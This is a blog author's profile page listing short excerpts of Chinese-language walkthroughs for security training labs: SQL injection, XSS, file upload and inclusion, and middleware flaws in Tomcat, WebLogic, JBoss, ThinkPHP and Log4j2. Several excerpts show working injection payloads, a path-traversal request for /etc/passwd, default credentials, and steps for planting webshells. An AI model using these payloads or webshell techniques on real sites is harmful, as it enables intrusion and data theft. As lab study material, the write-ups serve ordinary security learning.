自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(50)
  • 收藏
  • 关注

原创 小说漫画系统 fileupload.php 任意文件上传漏洞复现

作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。1.向靶场发送如下数据包。

2024-10-13 17:01:47 649

原创 【漏洞复现】(腾达)Tenda路由器 密码信息泄露漏洞

作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

2024-10-13 15:15:23 586

原创 FastBee开源物联网平台download接口存在任意文件读取漏洞 附POC

FastBee是一个简单易用的开源物联网平台,更适合中小企业和个人快速学习和搭建设备联网平台。

2024-10-13 14:55:30 431

原创 awvs测试自己pikachu站点输出漏洞报告教程

一.搭好pikachu查一下自己的ip。二.使用工具awvs扫描。3.查看扫描漏洞信息。

2024-09-25 18:08:42 560

原创 常见的框架漏洞

环境配置靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境访问靶场:http://172.16.1.4:8080/index.php远程命令执行POC:远程代码执行POC:getshell?>" >>1.php根目录生成1.php 文件,输出phpinfo。

2024-09-23 18:16:29 1082

原创 Apache 中间件漏洞

使⽤curl http://172.16.1.4:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd。访问172.16.1.4:8080。

2024-09-22 15:03:23 222

原创 Jboss常⻅中间件漏洞

3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub。

2024-09-22 09:42:55 545

原创 Weblogic中间件漏洞

环境搭建漏洞复现 默认账号密码:weblogic/Oracle@123 weblogic常⽤弱⼝令:https://cirt.net/passwords?1.登录后台后,点击部署,点击安装,点击上传⽂件。2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传然后⼀直下⼀步3.访问部署好的war 192.168.0.115:7001/1/1.jsp。

2024-09-20 20:14:00 747

原创 tomcat中间件漏洞CVE-2017-12615,后台弱口令部署war包,CVE-2020-1938

2. ⽂件上传成功后,默认会在⽹站根⽬录下⽣成和war包名称⼀致得⽬录,然后⽬录中得⽊⻢就是压缩 前的⽂件名。漏洞复现 http://172.16.1.22:8080/manager/html。制作WAR包,将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war就可以了。1.⾸⻚抓包,修改为 PUT ⽅式提交。默认密码:tomcat/tomcat。一.CVE-2017-12615。三.CVE-2020-1938。二.后台弱口令部署war包。

2024-09-20 18:12:24 519

原创 aspcms webshell漏洞复现

在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件。【ip】/admin_aspcms/login.asp访问后台,admin 123456登录。点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包。

2024-09-16 14:37:17 214

原创 dedecms靶场(四种webshell姿势)

点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化..点击【模板】【默认模板管理】【index.htm】【修改】 在文件修改中添加一句话木马 保存。点击 【模块】 【广告管理】【增加一个新广告】在【广告内容】 处添加一句话木马点击 【确定】点击【系统】【sql命令行工具】写入一句话木马到网站目录下的1.php文件中,确定。一.登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话木马上传。

2024-09-16 12:09:53 349

原创 seafaring靶场漏洞测试攻略

进入网页。

2024-09-13 20:59:49 358

原创 sqlgun靶场攻略

进入靶场界面输入框测试回显点-1'union select 1,2,3#看看有木有回显点查看数据库名-1'union select 1,2,database()#查看表名-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#查看admin表中列名-1'union select 1,2,grou

2024-09-13 20:30:28 215

原创 Rickdiculously Easy靶场渗透测试

靶机下载地址。

2024-09-11 17:17:33 680

原创 【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

【代码】【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现。

2024-09-07 12:47:12 845

原创 代码执行漏洞-Log4j2漏洞

action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址.反弹Shell-base64加密。

2024-09-07 10:51:52 565

原创 中间件漏洞解析

lls6.x在网站根目录下编写一个一句话木马然后进行访问lls7.x配置环境将 cgi.fix_pathinfo=1 前面的封号取消掉...并重启...利用姿势拿蚁剑进行链接。

2024-09-05 18:13:42 677

原创 hackme靶机通关攻略

数据改为1*,复制数据包到1.txt,发到kali里面。MD5解密superadmin 密码。搜索一本书抓包发放到重放器。sqlmap查看当前数据库。访问uploads文件夹。查看users表中列。

2024-09-04 16:59:44 317

原创 文件包含PHP伪协议利用方法

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)使⽤: file:// ⽂件的绝对路径和⽂件名。cmd=php://input抓包。⽤途:数据( RFC2397 )⽤途:常⽤于读取⽂件 / 源码。

2024-09-04 15:45:11 310

原创 tomato靶机通关攻略

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。找到一个/antibot_image/ 目录,进而找到/antibots/目录。在kali里面进行目录扫描,找到一个antibot_image。页面通过image传参查看passwd文件。用kali去扫描端口,发现有3个开放端口。页面通过image传参查看日志文件。发现可能存在文件包含。

2024-09-04 15:08:44 460

原创 pikachu文件包含漏洞靶场攻略

创建一个2.php文件,里面输入<?filename后面输入../../../../../1.php访问php文件。Allow_url_include=on //默认关闭。fileinclude目录下找到shell.php文件。allow_url_fopen=on //默认打开。访问php文件,连接。

2024-09-04 10:59:50 575

原创 sql-labs61-65关通关攻略

?id=1')) and updatexml(1,concat(1,(select database())),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(column

2024-09-02 14:26:49 1208

原创 sql-labs56-60通关攻略

?id=-1')union select 1,2,database()--+?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ ?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=

2024-09-02 11:31:23 1042

原创 sql-labs51-55通关攻略

1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+' and updatexml(1,concat(0x7e,(select group_concat(column

2024-08-30 17:36:52 1145

原创 upload-labs闯关攻略

提前准备好的一个PHP木马,然后将后缀名改为jpg上传然后在上传的过程中利用抓包,将抓取到的包里面的后缀jpg改为php如图所示,然后放行接着我们去访问上传的图片信息,如下图所示就为成功。

2024-08-30 17:35:55 974

原创 vulhub xxe靶机

进入robots.txt里面会发现俩个目录然后我们进去xxe里面。可以看到关于密码和用户名的是xml,那么就可以考虑用xxe注入。解码出来是/etc/.flag.php然后重新修改xml。将admin.php改为flagmeout.php。可以看到有很多乱码,然后进行base64解码。进入xxe页面进行登录,burp抓包。解码后发现还需要进行以此md5解码。先用御剑扫描出ip然后进入网页。然后编成php文件进行访问。进行base32解密。

2024-08-29 17:53:13 839

原创 sql-labs46-50通关攻略

四.查询user表中数据。四.查询user表中数据。

2024-08-29 15:19:48 1072

原创 xss-labs

进入16关页面输入<a%0dhref='javas%0acript:alert(1)'>xss然后点击xss。

2024-08-28 18:09:39 302

原创 sql-labs41-45关通关攻略

第43关第44关第45关。

2024-08-28 13:26:15 949

原创 xss-labs 11-15关通关攻略

发现有cook值,在这里注入Referer:"onclick="alert(1)"type="text。在抓到的数据包中加入Referer:"onclick="alert(1)"type="text。二.在ua头注入 Referer:"onclick="alert(1)"type="text。点击f12 在图片标签里添加一个点击事件 οnclick='alert(1)'进入第12关发现没有注入点,进入源代码看哪里可以注入发现。src='./level1.php'文件。进如第13关,发现没有注入点。

2024-08-27 19:33:51 211

原创 sql-labs36-40通关攻略

id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+进入重放器uname=-1%df' union select database(),2#&passwd=1&submit=Submitid=1%27--+id=1--+

2024-08-27 18:22:50 1305

原创 cthub-ssrf通关攻略

然后就进来页面了。

2024-08-27 15:55:11 848

原创 sql-labs31-35关通关攻略

1“”

2024-08-26 18:23:35 1062

原创 xss-labs靶场6-10关

没有输入的地方,就在URL中,尝试将隐藏标签显示出来。将javascript:alert(1)进行编码后。将javascript:alert(1)进行编码。使用a标签,发现a标签可以。后面再加上//http://然后将编码输入再次点击链接。点击一下输入框,完成。

2024-08-26 17:42:26 396

原创 xss-labs1-5关通关攻略

点击图片进入第一关。

2024-08-25 09:41:32 580

原创 sqli-labsSQL手工注入第26-30关

http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1

2024-08-24 20:25:28 1272

原创 sqlilabs less21-25关手工注入

使用二次注入 http://127.0.0.1/Less-25/?

2024-08-22 21:31:11 1135 1

原创 pikachu-Cross-Site Scripting通过攻略

反射型xss(get)第一步:进入先将maxlength中的20修改大一些,以便我们可以输入更多的字符第二步:输入<script>alert(1)</script>成功爆破反射型xss(post)第一步:点击提示得到用户名和密码登录第二步:输入<script>alert(1)</script>成功爆破存储型xss在留言框里输入<script>alert(1)</script>成功爆

2024-08-22 17:39:38 386

原创 sqlilabs less16-20关手工注入

闭合方式点“)

2024-08-21 18:14:43 1146

原创 Oracle⼿⼯注⼊

此次靶场地址为:墨者学院。

2024-08-20 19:13:01 720

ASSESS手工注入(附搭建教程)

靶场环境

2024-08-20

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除